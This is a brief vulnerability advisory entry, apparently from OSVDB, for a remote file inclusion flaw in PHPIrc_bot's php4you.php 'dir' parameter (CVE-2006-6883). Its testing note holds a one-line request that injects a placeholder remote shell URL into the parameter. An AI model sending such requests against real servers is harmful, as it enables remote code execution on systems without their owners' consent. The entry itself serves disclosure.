PHPIrc_bot php4you.php dir Variable Remote File Inclusion

2006-12-31T01:11:15
ID OSVDB:33358
Type osvdb
Reporter OSVDB
Modified 2006-12-31T01:11:15

Description

Manual Testing Notes

http://[target]/[script_path]/php4you.php?dir=http://sh3LL?

References:

Mail List Post: http://attrition.org/pipermail/vim/2007-January/001206.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0006.html ISS X-Force ID: 31185 CVE-2006-6883